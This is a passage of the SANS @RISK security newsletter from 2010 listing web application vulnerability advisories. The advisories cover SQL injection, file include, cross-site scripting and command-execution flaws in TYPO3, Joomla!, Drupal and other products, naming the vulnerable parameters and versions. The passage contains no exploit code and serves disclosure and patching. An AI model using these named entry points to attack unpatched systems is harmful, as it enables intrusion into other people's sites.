  • Description: CleanDB - DBAL (tmsw_cleandb) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. CleanDB - DBAL versions 2.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.58 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 SAV Filter Alphabetic Extension SQL Injection
  • Description: SAV Filter Alphabetic ('sav_filter_abc') is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL-query. SAV Filter Alphabetic versions 1.0.8 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.59 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Book Reviews Extension Unspecified SQL Injection
  • Description: TYPO3 Book Reviews (sk_bookreview) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Book Reviews versions 0.0.12 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.60 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 SAV Filter Months Extension SQL Injection
  • Description: SAV Filter Months (sav_filter_months) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. SAV Filter Months versions 1.0.4 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.61 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 CleanDB Extension Unspecified SQL Injection
  • Description: CleanDB (nf_cleandb) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. CleanDB versions 1.0.7 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.62 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PhpMyLogon "username" Parameter SQL Injection
  • Description: PhpMyLogon is a PHP-based web application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "username" parameter before using it in an SQL query. PhpMyLogon version 2 is affected.
  • Ref: http://www.securityfocus.com/bid/38776
  • 10.13.63 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Educator Extension Unspecified SQL Injection
  • Description: Educator (educator) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Educator versions 0.1.5 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.64 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Wastebasket Extension Unspecified SQL Injection
  • Description: Wastebasket (mk_wastebasket) is an extension for the TYPO3 content manager. Wastebasket is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Wastebasket versions 2.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.65 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Multi Auktions Komplett System "id_auk" Parameter SQL Injection
  • Description: Multi Auktions Komplett System is a web-based shopping application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data. Specifically, this issue affects the "id_auk" parameter of the "auktion.php" script. Multi Auktions Komplett System v3 is affected.
  • Ref: http://www.securityfocus.com/bid/38793
  • 10.13.66 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: TYPO3 Brainstorming Extension Unspecified SQL Injection
  • Description: The Brainstorming application is an extension for the TYPO3 content manager. The extension is exposed to an unspecified SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Brainstorming versions 0.1.8 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.67 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHP-Nuke Downloads Module "lid" Parameter SQL Injection
  • Description: Downloads is a module for the PHP-Nuke content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "lid" parameter when the "file" parameter is set to "index" and the "d_op" parameter is set to "ratedownloads".
  • Ref: http://www.securityfocus.com/bid/38826
  • 10.13.68 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpBB2 Plus "kb.php" SQL Injection
  • Description: phpBB2 Plus is a version of the phpBB bulletin board that has been modified to include added features. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data. phpBB2 Plus version 1.53 is affected.
  • Ref: http://www.securityfocus.com/bid/38828
  • 10.13.69 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ABO.CMS "c.php" Multiple SQL Injection Vulnerabilities
  • Description: ABO.CMS is a PHP-based content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied input to the "resolution" parameter of the "c.php" script. ABO.CMS version 5.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38847
  • 10.13.70 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: tenfourzero.net Shutter "admin.html" Multiple SQL Injection Vulnerabilities
  • Description: tenfourzero.net's Shutter is a photo sharing application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "albumID" and "photoID" parameters of the "admin.html" script before using the data in an SQL query. Shutter version 0.1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38849
  • 10.13.71 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: philboard "forumid" Parameter SQL Injection
  • Description: philboard is a forum implemented in ASP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "forumid" parameter in the "buscahost_forum.asp" script. philboard version 1.02 is affected.
  • Ref: http://www.securityfocus.com/bid/38854
  • 10.13.72 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Teamsite Hack Plugin "userid" Parameter SQL Injection
  • Description: Teamsite Hack is a plugin for the Woltlab Burning Board web application. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "userid" parameter of the "ts_other.php" script before using it an SQL query. Teamsite Hack 3.0 and earlier versions are affected.
  • Ref: http://www.securityfocus.com/bid/38870
  • 10.13.73 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Woltlab Burning Board Lexikon Plugin "id" Parameter SQL Injection
  • Description: Lexikon is a plugin for the Woltlab Burning Board web application. The component is exposed to an SQL injection issue because it fails to sanitize user-supplied data to the "id" parameter before using it an SQL query. The current version of Lexikon is affected.
  • Ref: http://www.securityfocus.com/bid/38871
  • 10.13.74 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Pay Per Auction Watch & Bid System "id_auk" Parameter SQL Injection
  • Description: Pay Per Auction Watch & Bid System is a PHP-based auction application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "id_auc" parameter of the "auktion.php" script.
  • Ref: http://www.securityfocus.com/bid/38878
  • 10.13.75 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Mini CMS RibaFS "admin/login.php" SQL Injection
  • Description: Mini CMS RibaFS is a PHP-based content management system. The application is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "login" field of the "admin/login.php" script. Mini CMS RibaFS versions 1.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38881/info
  • 10.13.76 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Powie PowieSys "shownews" Parameter SQL Injection
  • Description: PowieSys is a PHP-based web application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "shownews" parameter of the "index.php" script file before using it in an SQL query. PowieSys version 0.7.7 alpha is affected.
  • Ref: http://www.securityfocus.com/bid/38886
  • 10.13.77 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: OpenPage "index.php" SQL Injection
  • Description: Openpage is a PHP-based content management application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it an SQL query. This occurs in the "id" parameter of the "index.php" script when the "pagina" parameter is set to "news".
  • Ref: http://www.securityfocus.com/bid/38888
  • 10.13.78 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_flash" Component "sid" Parameter SQL Injection
  • Description: "com_flash" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "sid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38890
  • 10.13.79 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PHPKIT "b-day.php" Addon SQL Injection
  • Description: PHPKIT is a web portal application. PHPKIT is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "ausgabe" parameter of the "b-day.php" addon before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38891
  • 10.13.80 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: RepairShop 2 "prod" Parameter Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: RepairShop 2 is a PHP-based customer service application. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied input to the "prod" parameter of the "index.php" script when "b" is set to "products.details". RepairShop 2 version 1.9.023 Trial is affected.
  • Ref: http://www.securityfocus.com/bid/38907
  • 10.13.81 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Kasseler CMS News Module "id" Parameter SQL Injection
  • Description: Kasseler CMS is a PHP-based content manager. Kasseler CMS is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script when the "module" parameter is set to "news".
  • Ref: http://www.securityfocus.com/bid/38909
  • 10.13.82 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_gds" Component "sid" Parameter SQL Injection
  • Description: "com_gds" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "storeid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38910
  • 10.13.83 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_aml_2" Component "art" Parameter SQL Injection
  • Description: "com_aml_2" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "art" parameter before using it in an SQL query.
  • Ref: http://www.exploit-db.com/exploits/11859
  • 10.13.84 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_cx" Component "postid" Parameter SQL Injection
  • Description: "com_cx" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "postid" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38915
  • 10.13.85 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! "com_cb" Component "cat" Parameter SQL Injection
  • Description: "com_cb" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38916
  • 10.13.86 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 SAV Filter Selectors Extension SQL Injection
  • Description: SAV Filter Selectors (sav_filter_selectors) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. SAV Filter Selectors versions 1.0.4 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.87 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 TGM-Newsletter Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: TGM-Newsletter (tgm_newsletter) is a PHP-based blog component for TYPO3. The extension is exposed to multiple SQL injection and cross-site scripting issues. TGM-Newsletter versions 0.0.2 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.88 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 YATSE - Yet Another TYPO3 Search Engine Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: YATSE - Yet another TYPO3 Search Engine (yatse) is an extension for the TYPO3 content management system. The extension is exposed to multiple SQL injection and cross-site scripting issues. YATSE - Yet another TYPO3 Search Engine versions 0.3.1 and prior are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.89 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Power Extension Manager Unspecified Information Disclosure
  • Description: TYPO3 Power Extension Manager (ch_lightem) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified information-disclosure issue. TYPO3 Power Extension Manager versions 1.0.34 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.90 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Diocese of Portsmouth Database Extension SQL Injection
  • Description: Diocese of Portsmouth Database (sav_diocesedatabase) is an extension for the TYPO3 content manager. The extension is exposed to an SQL injection issue because it fails to sufficiently sanitize input before using it in an SQL query. Diocese of Portsmouth Database versions 0.7.12 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.91 - CVE: Not Available
  • Platform: Web Application
  • Title: Quicksilver Forums Multiple Information Disclosure Vulnerabilities
  • Description: Quicksilver Forums is a web-based forum application implemented in PHP. The application is exposed to multiple information disclosure issues. Attackers can exploit these issues to obtain sensitive information that may lead to other attacks. Quicksilver Forums version 1.4.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/510160
  • 10.13.92 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Email Input Filter PHP Code Execution
  • Description: Email Input Filter module is an email filter module for the Drupal content manager. The Email Input Filter module is exposed to a remote PHP code execution issue that occurs because the application allows users to create arbitrary content using an unspecified input format. Email Input Filter versions prior to 6.x-1.1 are affected.
  • Ref: http://drupal.org/node/745390
  • 10.13.93 - CVE: Not Available
  • Platform: Web Application
  • Title: eFront "langname" Parameter Local File Include
  • Description: eFront is a PHP-based e-learning application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "langname" parameter of the "www/editor/tiny_mce/langs/language.php" script. eFront versions 3.5.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/510155
  • 10.13.94 - CVE: Not Available
  • Platform: Web Application
  • Title: VXDate Component for Joomla! Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: VXDate is a component for the Joomla! content manager. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied data to the "id" parameter of the "com_vxdate" component.
  • Ref: http://www.securityfocus.com/archive/1/510158
  • 10.13.95 - CVE: Not Available
  • Platform: Web Application
  • Title: eGroupware "aspell_path" Parameter Arbitrary Command Execution
  • Description: eGroupware is a web-based groupware application implemented in PHP. The application is exposed to an issue that lets attackers execute arbitrary shell commands. This issue occurs because the application fails to sufficiently sanitize user-supplied data to the "aspell_path" parameter of the "phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" script.
  • Ref: http://www.securityfocus.com/bid/38794
  • 10.13.96 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Simple Gallery Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: Simple Gallery (sk_simplegallery) is a PHP-based blog component for TYPO3. The extension is exposed to multiple unspecified SQL injection and cross-site scripting issues. Simple Gallery versions 0.0.9 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.97 - CVE: Not Available
  • Platform: Web Application
  • Title: TYPO3 Security - Salted User Password Hashes Security Bypass
  • Description: TYPO3 Security - Salted user password hashes is a third-party extension for the TYPO3 content manager. The extension is exposed to an authentication bypass issue due to an unspecified error. TYPO3 Security - Salted user password hashes versions 0.2.12 and prior are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/
  • 10.13.98 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Keys Module Key Delete Form Cross-Site Request Forgery
  • Description: Keys is a module for the Drupal content management system. The module is exposed to a cross-site request forgery issue that affects the keys delete form. Keys versions prior to 6.x-2.0 are affected.
  • Ref: http://drupal.org/node/745392
  • 10.13.99 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Tag Order Taxonomy Vocabulary Name HTML Injection
  • Description: Tag Order is a PHP-based component for the Drupal content manager. The Tag Order module for Drupal is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input passed. This issue affects the Taxonomy vocabulary name field. Tag Order versions prior to 5.x-1.4 and 6.x-1.4 are affected.
  • Ref: http://drupal.org/node/745386
  • 10.13.100 - CVE: Not Available
  • Platform: Web Application
  • Title: phpMyVisites ClickHeat Plugin Unspecified Security
  • Description: phpMyVisites is a website statistics measurement application. The application is exposed to an unspecified security issue that affects the "clickheat" plugin. phpMyVisites versions prior to 2.4 are affected.
  • Ref: http://www.phpmyvisites.us/
  • 10.13.101 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_alert" Component "q_item" Parameter SQL Injection
  • Description: "com_alert" is a component for the Joomla! content manager. The component is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "q_item" parameter before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/38827
  • 10.13.102 - CVE: Not Available
  • Platform: Web Application
  • Title: Nensor CMS Local File Include and SQL Injection Vulnerabilities
  • Description: Nensor CMS is a PHP-based content manager. The application is exposed to multiple input validation issues. An attacker can exploit the local file include issue using directory traversal strings to view and execute arbitrary local files within the context of the web server process. Nensor CMS 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38839
  • 10.13.103 - CVE: Not Available
  • Platform: Web Application
  • Title: Softsaurus CMS Multiple Remote File Include Vulnerabilities
  • Description: Softsaurus CMS is a PHP-based content manager. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input. Softsaurus CMS version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38842
  • 10.13.104 - CVE: Not Available
  • Platform: Web Application
  • Title: ikiwiki "htmlscrubber" Plugin Remote Script Code Injection
  • Description: The "ikiwiki" program is a wiki compiler. The program is exposed to a remote script injection issue because it fails to properly sanitize user-supplied input to the "htmlscrubber" plugin. Specifically, the plugin allows "data:image/svg+xml" URIs, which can contain script code. ikiwiki versions prior to 3.20100312 and 2.53.5 are affected.
  • Ref: http://ikiwiki.info/security/#index36h2
  • 10.13.105 - CVE: Not Available
  • Platform: Web Application
  • Title: chillyCMS "admin/index.php" Cross-Site Scripting
  • Description: chillyCMS is a PHP-based content manager. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input to the "name" parameter of the "admin/index.php" script. chillyCMS version 1.0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/38846
  • 10.13.106 - CVE: Not Available
  • Platform: Web Application
  • Title: Kempt SiteDone "detail.php" Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: Kempt SiteDone is a PHP-based content management application. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sanitize user-supplied input to the "articleId" parameter of the "detail.php" script. Kempt SiteDone version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38856
  • 10.13.107 - CVE: Not Available
  • Platform: Web Application
  • Title: Limny 2.01 Multiple Remote Vulnerabilities
  • Description: Limny is a PHP-based content manager. Limny is exposed to multiple remote issues. The attacker may exploit these issues to compromise the application, execute arbitrary code, steal cookie-based authentication credentials, gain unauthorized access to the application, modify data, or exploit latent vulnerabilities in the underlying database. Limny version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/38859
  • 10.13.108 - CVE: Not Available
  • Platform: Web Application
  • Title: Dew-Code Dew-NewPHPLinks "lang" Parameter Multiple Local File Include Vulnerabilities
  • Description: Dew-Code Dew-NewPHPLinks is a PHP-based web application. The application is exposed to local file include issues because it fails to properly sanitize user-supplied input. Dew-Code Dew-NewPHPLinks version 2.1.0.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38864
  • 10.13.109 - CVE: Not Available
  • Platform: Web Application
  • Title: Sahana "stream.php" Authentication Bypass
  • Description: Sahana is a disaster management application. The application is exposed to an authentication bypass issue. Specifically, an attacker can exploit this issue by accessing the "stream.php" script directly and without authentication. Sahana version 0.6.2.2 is affected.
  • Ref: http://www.securityfocus.com/bid/38863
  • 10.13.110 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_jeformcr" Component "view" Parameter Local File Include
  • Description: The "com_jeformcr" application is a component for the Joomla! content manager. The component is vulnerable to a local file include vulnerability because it fails to properly sanitize user-supplied input to the "view" parameter of "com_jeformcr". The all versions of com_jeformcr are vulnerable.
  • Ref: http://www.securityfocus.com/bid/38866
  • 10.13.111 - CVE: Not Available
  • Platform: Web Application
  • Title: agXchange ESM "ucschcancelproc.jsp" Open Redirection
  • Description: agXchange ESM is an electronic safety report communication application. It is exposed to an open redirection issue due to insufficient sanitization of user-supplied input to the "returnpage" parameter of the "ucschcancelproc.jsp" script. The current version is affected.
  • Ref: http://www.securityfocus.com/bid/38879
  • 10.13.112 - CVE: Not Available
  • Platform: Web Application
  • Title: Lussumo Vanilla "definitions.php" Multiple Remote File Include Vulnerabilities
  • Description: Vanilla is a PHP-based discussion forum. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input. Vanilla versions 1.1.10 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38889
  • 10.13.113 - CVE: Not Available
  • Platform: Web Application
  • Title: Stack "action" Parameter Local File Include
  • Description: Stack is an application for teaching and assessment; it uses a computer algebra system. Stack is exposed to a local file include issue because it fails to properly sanitize user-supplied input. This issue affects the "action" parameter of the "documentation.php" script. Stack versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38899
  • 10.13.114 - CVE: Not Available
  • Platform: Web Application
  • Title: Secure Portal and Secure Dept Portal Page Restriction Security Bypass
  • Description: Secure Portal and Secure Dept Portal are web portal applications. Secure Portal and Secure Dept Portal are exposed to a security bypass issue because the applications fail to restrict access to certain pages. Secure Portal versions prior to 3.5.0 and Secure Dept Portal 1.2.0 are affected.
  • Ref: http://changelog.wolf-software.net/list_changelog_entries.php?groupname=secure_p
    ortal
  • 10.13.115 - CVE: Not Available
  • Platform: Web Application
  • Title: phpAuthent "useradd.php" Multiple HTML Injection Vulnerabilities
  • Description: phpAuthent is a PHP-based website authentication manager. phpAuthent is exposed to multiple HTML injection issue because it fails to properly sanitize user-supplied input. Specifically, the "name", "email" and "password" fields of the "useradd.php" script are affected. phpAuthent version 0.2.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38908
  • 10.13.116 - CVE: Not Available
  • Platform: Web Application
  • Title: SMEStorage "com_smestorage" Component for Joomla! Local File Include
  • Description: The SMEStorage application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_smestorage".
  • Ref: http://www.securityfocus.com/bid/38911
  • 10.13.117 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_properties" Component "controller" Parameter Local File Include
  • Description: The "com_properties" application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_properties".
  • Ref: http://www.securityfocus.com/bid/38912
  • 10.13.118 - CVE: Not Available
  • Platform: Web Application
  • Title: Joomla! "com_jresearch" Component "controller" Parameter Local File Include
  • Description: The "com_jresearch" application is a component for the Joomla! content manager. The component is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "controller" parameter of "com_jresearch".
  • Ref: http://www.securityfocus.com/bid/38917

(c) 2010. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

SANS is hands down the best bang for the buck available, no one else even comes close!
-Derek Masseth, University of Arizona

NetWars - Cyber Range

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"As a security professional, this info is foundational to do a competent job, let alone be successful."
- Michael Foster, Providence Health & Security

"Because of the use of real-world examples it's easier to apply what you learn."
- Danny Hill, Friedkin Companies, Inc.

"The amount of knowledge conveyed and technical diving by practical hands-on was well balanced."
- Aaron Moore, Maricopa County